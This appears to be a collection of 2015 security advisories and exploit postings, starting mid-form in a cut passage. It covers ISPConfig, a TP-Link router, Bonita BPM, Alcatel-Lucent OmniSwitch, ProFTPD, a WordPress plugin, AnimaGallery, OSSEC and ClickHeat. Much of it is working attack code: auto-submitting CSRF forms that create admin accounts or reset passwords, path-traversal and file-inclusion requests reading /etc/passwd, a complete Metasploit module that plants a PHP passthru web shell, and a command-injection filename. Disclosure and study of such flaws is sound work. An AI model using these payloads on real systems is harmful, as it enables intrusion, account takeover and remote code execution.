type="hidden" name="passwort" value="immuniweb"> <input type="hidden" name="repeat_password" value="immuniweb"> <input type="hidden" name="modules[]" value="vm"> <input type="hidden" name="modules[]" value="mail"> <input type="hidden" name="modules[]" value="help"> <input type="hidden" name="modules[]" value="monitor"> <input type="hidden" name="startmodule" value="vm"> <input type="hidden" name="app_theme[]" value="default"> <input type="hidden" name="typ[]" value="admin"> <input type="hidden" name="active" value="1"> <input type="hidden" name="language" value="en"> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> ----------------------------------------------------------------------------------------------- Solution: Update to ISPConfig 3.0.5.4p7 More Information: http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig. [2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

TP-Link ADSL2+ TD-W8950ND Unauthenticated Remote DNS Change Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg No description for morons, script kiddies & noobs !! Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! [todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

Advisory ID: HTB23259 Product: Bonita BPM Vendor: Bonitasoft Vulnerable Version(s): 6.5.1 and probably prior Tested Version: 6.5.1 (Windows and Mac OS packages) Advisory Publication: May 7, 2015 [without technical details] Vendor Notification: May 7, 2015 Vendor Patch: June 9, 2015 Public Disclosure: June 10, 2015 Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601] CVE References: CVE-2015-3897, CVE-2015-3898 Risk Level: High CVSSv2 Base Scores: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted. 1) Path Traversal in Bonita BPM Portal: CVE-2015-3897 User-supplied input passed via the "theme" and "location" HTTP GET parametres to "bonita/portal/themeResource" URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user. Simple PoC code below will return content of "C:/Windows/system.ini" file: http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini Second PoC will disclose the content of "/etc/passwd" file: http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd 2) Open Redirect in Bonita BPM Portal: CVE-2015-3898 Input passed via the "redirectUrl" HTTP GET parametre to "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as redirect URL. After login user may be redirected to arbitrary website: http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/ ----------------------------------------------------------------------------------------------- Solution: Update to Bonita BPM 6.5.3 More Information: http://community.bonitasoft.com/blog/bonita-bpm-653-available ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM. [2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860 Affected Versions: All Releases: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 AOS 7.3.2.R01 AOS 7.3.3.R01 AOS 7.3.4.R01 AOS 8.1.1.R01 Fixed Versions: - Vulnerability Type: Cross-site request forgery Security Risk: medium Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004 Advisory Status: published CVE: CVE-2015-2805 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts, in this case an HTTP request like the following is sent to the switch: POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 214 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:244.T1:O1=secret &EmWeb_ns:mip:246.T1:O2=-1 &EmWeb_ns:mip:248.T1:O3= &EmWeb_ns:mip:249.T1:O4=1 &EmWeb_ns:mip:250.T1:O5=4 This request creates a user "attacker" with the password "secret". All other parametres are static. All POST parametres can be predicted by attackers This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed. In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following: POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1 Host: 192.0.2.1 [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 167 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:4.T1:O1= &EmWeb_ns:mip:5.T1:O2= &EmWeb_ns:mip:6.T1:O3=4294967295 &EmWeb_ns:mip:7.T1:O4=4294967295 This request sets all access privileges for the user "attacker" and is again completely predictable. Proof of Concept ================ Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch: ------------------------------------------------------------------------ <html> <head> <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title> </head> <body> <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> ------------------------------------------------------------------------ Workaround ========== Disable the web interface by executing the following commands: AOS6: no ip service http no ip service secure-http AOS 7/8: ip service http admin-state disable If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface. Fix === Upgrade the firmware to a fixed version, according to the vendor the fixed versions will be available at the end of July 2015. Security Risk ============= If attackers trick a logged-in administrator to visit an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end

# Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4 # Submitter: Nitin Venkatesh # Product: Encrypted Contact Form Wordpress Plugin # Product URL: https://wordpress.org/plugins/encrypted-contact-form/ # Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site scripting[CWE-79] # Affected Versions: v1.0.4 and possibly below. # Tested versions: v1.0.4 # Fixed Version: v1.1 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/ # Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/ # CVE Status: CVE-2015-4010 ## Product Information: Secure contact form for WordPress. Uses end-to-end encryption to send user information. Not even your hosting provider can view the content. Let users send you information in a secure way. Uses I.CX messaging service to encrypt user content in their own web browsers before sending to you. ## Vulnerability Description: The forms in the admin area of the plugin are vulnerable to CSRF, via which the contact forms generated are susceptible to XSS via unsanitized POST parametre. For example, the admin function of updating an existing form can be done via CSRF. Hence, by submitting a crafted HTML string in the parametres via CSRF, a XSS attack gets launched which affects all the visitors of the page(s) containing the contact form. ## Proof of Concept: <form action="http://localhost/wp-admin/options-general.php?page=conformconf"; method="post"> <input type="hidden" name="name" value="required" /> <input type="hidden" name="email" value="optional" /> <input type="hidden" name="phone" value="off" /> <input type="hidden" name="message" value="required" /> <input type="hidden" name="display_name" value="Example" /> <input type="hidden" name="recipient_name" value="example" /> <input type="hidden" name="cfc_page_name" value="" /> <!-- Wordpress page-id value --> <input type="hidden" name="existing_page" value="28" /> <input type="hidden" name="cfc_selection" value="upd" /> <input type="hidden" name="iframe_url" value=""></iframe><script>alert('XSS!');</script>" /> <input type="submit" value="Update Page"> </form> ## Solution: Upgrade to v1.1 of the plugin. ## Disclosure Timeline: 2015-03-26 - Discovered. Contacted developer on support forums. 2015-03-27 - Contacted developer via contact form on vendor site. 2015-04-01 - Fixed v1.1 released. 2015-05-15 - Published disclosure on FD. 2015-05-16 - CVE assigned ## References: CVE Assign - http://seclists.org/oss-sec/2015/q2/471 http://packetstormsecurity.com/files/131955/ https://wpvulndb.com/vulnerabilities/7992 ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability # Date: 2015/06/07 # Vendor Homepage: http://dg.no.sapo.pt/ # Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip # Version: 2.6 # Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps * Description func.php line 21 - 22: include('themes/'.$THEME.'/templates.php'); include('languages/'.$LANG.'.php'); $lang and $THEME parametre from import_theme_lang() function. function import_theme_lang() { $THEME = DEFAULT_THEME; if(isset($_COOKIE['theme']) AND !THEME_LOCKED) $THEME = $_COOKIE['theme']; <-- Not Taint Checking $LANG = DEFAULT_LANG; if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED) $LANG = $_COOKIE['lang']; <--- Not Taint Checking return(array($THEME, $LANG)); } * Proof of Concept curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00" curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"

Fix for CVE-2015-3222 which allows for root escalation via syscheck - https://github.com/ossec/ossec-hids/releases/tag/2.8.2 Affected versions: 2.7 - 2.8.1 Beginning is OSSEC 2.7 (d88cf1c9) a feature was added to syscheck, which is the daemon that monitors file changes on a system, called "report_changes". This feature is only available on *NIX systems. It's purpose is to help determine what about a file has changed. The logic to do accomplish this is as follows which can be found in src/syscheck/seechanges.c: 252 /* Run diff */ 253 date_of_change = File_DateofChange(old_location); 254 snprintf(diff_cmd, 2048, "diff \"%s\" \"%s\"> \"%s/local/%s/diff.%d\" " 255 "2>/dev/null", 256 tmp_location, old_location, 257 DIFF_DIR_PATH, filename + 1, (int)date_of_change); 258 if (system(diff_cmd) != 256) { 259 merror("%s: ERROR: Unable to run diff for %s", 260 ARGV0, filename); 261 return (NULL); 262 } Above, on line 258, the system() call is used to shell out to the system's "diff" command. The raw filename is passed in as an argument which presents an attacker with the possibility to run arbitrary code. Since the syscheck daemon runs as the root user so it can inspect any file on the system for changes, any code run using this vulnerability will also be run as the root user. An example attack might be creating a file called "foo-$(touch bar)" which should create another file "bar". Again, this vulnerability exists only on *NIX systems and is contingent on the following criteria: 1. A vulnerable version is in use. 2. The OSSEC agent is configured to use syscheck to monitor the file system for changes. 3. The list of directories monitored by syscheck includes those writable by underprivileged users. 4. The "report_changes" option is enabled for any of those directories. The fix for this is to create temporary trusted file names that symlink back to the original files before calling system() and running the system's "diff" command.

# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF # Google Dork: allinurl:/clickheat/ # Date: 11-06-2015 # Exploit Author: David Shanahan (@CyberpunkSec) # Contact: https://twitter.com/CyberpunkSec # Vendor Homepage: http://www.labsmedia.com/clickheat/index.html # Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/ # Version: 1.14 # Tested on: Windows ---- Description ---- ClickHeat is vulnerable to a CSRF attack because it does not implement a CSRF token when updating the config file. If an authenticated admin is tricked into opening this malicious URL, the form will be submitted which changes the administrator password to the one the attacker has specified. ---- CSRF PoC ---- Set the value of "adminLogin" to the administrators username, then set the value of "adminPass" to a md5 hash of the password you want. (you may also need to change the "logPath" & "cachePath") /* CODE */ <body onload="document.forms[0].submit()"> <form action="http://127.0.0.1/clickheat/index.php?action=config" method="post" class="center"> <input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp /htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat /cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:" adminLogin";s:5:"admin";s:9:"adminPass";s:32:" 5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass ";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:" heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes ";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes ";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__ browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}" /> <input type="hidden" name="save" value="true" /><input type="submit" value="Save configuration" /></form> /* CODE */ ---- Solution ---- The ClickHeat project seems to be dead, as it has not been updated since late 2011. Due to this, I truly doubt a patch will be issued so I would recommend removing this product from your website.